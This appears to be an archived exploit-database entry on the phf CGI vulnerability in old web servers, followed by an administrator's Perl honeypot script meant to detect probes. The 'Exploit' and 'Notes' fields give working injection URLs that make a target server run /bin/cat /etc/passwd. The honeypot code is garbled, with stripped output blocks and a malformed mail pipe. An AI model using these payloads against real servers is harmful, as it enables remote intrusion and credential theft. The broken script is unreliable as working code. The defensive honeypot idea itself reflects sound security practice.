/cgi-bin/phf vulnerability /cgi-bin/phf vulnerability Description: A VERY well known character escaping vulnerabity in some phf cgi scripts. Author: Unknown Compromise: Generally 'nobody' or 'daemon' but sometimes root . Whatever httpd is running. (REMOTE) Vulnerable Systems: Many old web server distributions came with phf installed Date: Unknown but has probably been known since about Jan 1996 Notes: Since some systems have vulnerable bash you can also try http://host.com/cgi-bin/phf?Qalias=%ff/bin/cat%20/etc/passwd. Also see addendum for a fake phf script to fool would-be crackers. Exploit: It is something like http://host.com/cgi-bin/phf?Qalias=%0A/bin/cat%20/etc/passwd Addendum(if any): Greetings Recently I have seen quite an upswing in attacks against web servers with people trying exploit various CGI binaries including Phf. Phf has a known vulnerability that is being widely exploited in how it handles certain escaped arguments. To let me know of attacks on sites via this vulnerability I installed the following script on our web servers. I don't run phf on our systems so there is no problem of interrupting normal activity. The script simply looks like the original PHF program however it mails the security person whenever connections or probes are received. The idea of luring attacks and presenting false information in an interesting one as an attacker needs to find a vulnerability to exploit to get into the system. If vulnerabilities are presented that are not legitimate it is more difficult for an attacker to decide what is legitimate and what is just bait. If people wish to attack a system they take the risk that they are either falling into a trap or actually getting into the system. Its interesting to blur the two. Along with scripts like below people can play games with modified sendmail version lines or even presenting false login screens with the tcp wrapper twist. In any case the script below was just thrown together as an example. On some sites I run one similar to it and it works very well as an early warning against attacks. Before running it I would certainly look it over to decide if its safe for your system. If you see problems please let me know. Paul Danckaert pauld@lemur.org ---------------------------------------------------------------------- #!/usr/bin/perl # # Pseudo-Phf - A not-quite-real phf replacement that provides a warning # against attacks as well as presenting false # information to the attacker. # # Paul Danckaert (pauld@lemur.org) # $email = "security@lemur.org"; $sendmail = "/usr/lib/sendmail"; ### print "Content-type: text/html\n\n"; if ($ENV{"QUERY_STRING"} eq "") { do ShowForm(); $action = "Looked At Form"; } else { if ($ENV{"QUERY_STRING"} =~ /(\/|%2f)passwd/i) { do ShowBadPass(); $action = "Attempted Password Grab"; } else { $action = "Submitted Form"; } } $notice = "[/CGI-BIN/PHF] $action"; open(MAIL | $sendmail $email ); print MAIL "From: PHF Watcher \n"; print MAIL "To: $email\n"; print MAIL "Subject: $notice\n\n"; print MAIL "[AutoMessage from PHF]\n\n"; print MAIL "ENV List\n------------------------------------------\n"; foreach $var (keys %ENV) { $ENV{$var} =~ s/\n//g; print MAIL "$var \t $ENV{$var}\n"; } print MAIL ".\n\n"; close (MAIL); # # Print Error Message to the users request. # print Query Results /usr/local/bin/ph - Command not found EOF exit 0; sub ShowForm { print Form for CSO PH query Form for CSO PH query This form will send a PH query to the specified ph server. PH Server: At least one of these fields must be specified: Alias Name E-mail Address Nickname Office Phone Number HAM Callsign Proxy High School SLIP Address Show additional fields to narrow query Return more than default fields Questions comments to: Jim Browne EOF } sub ShowBadPass { print [Back] to Fyodor's Exploit World!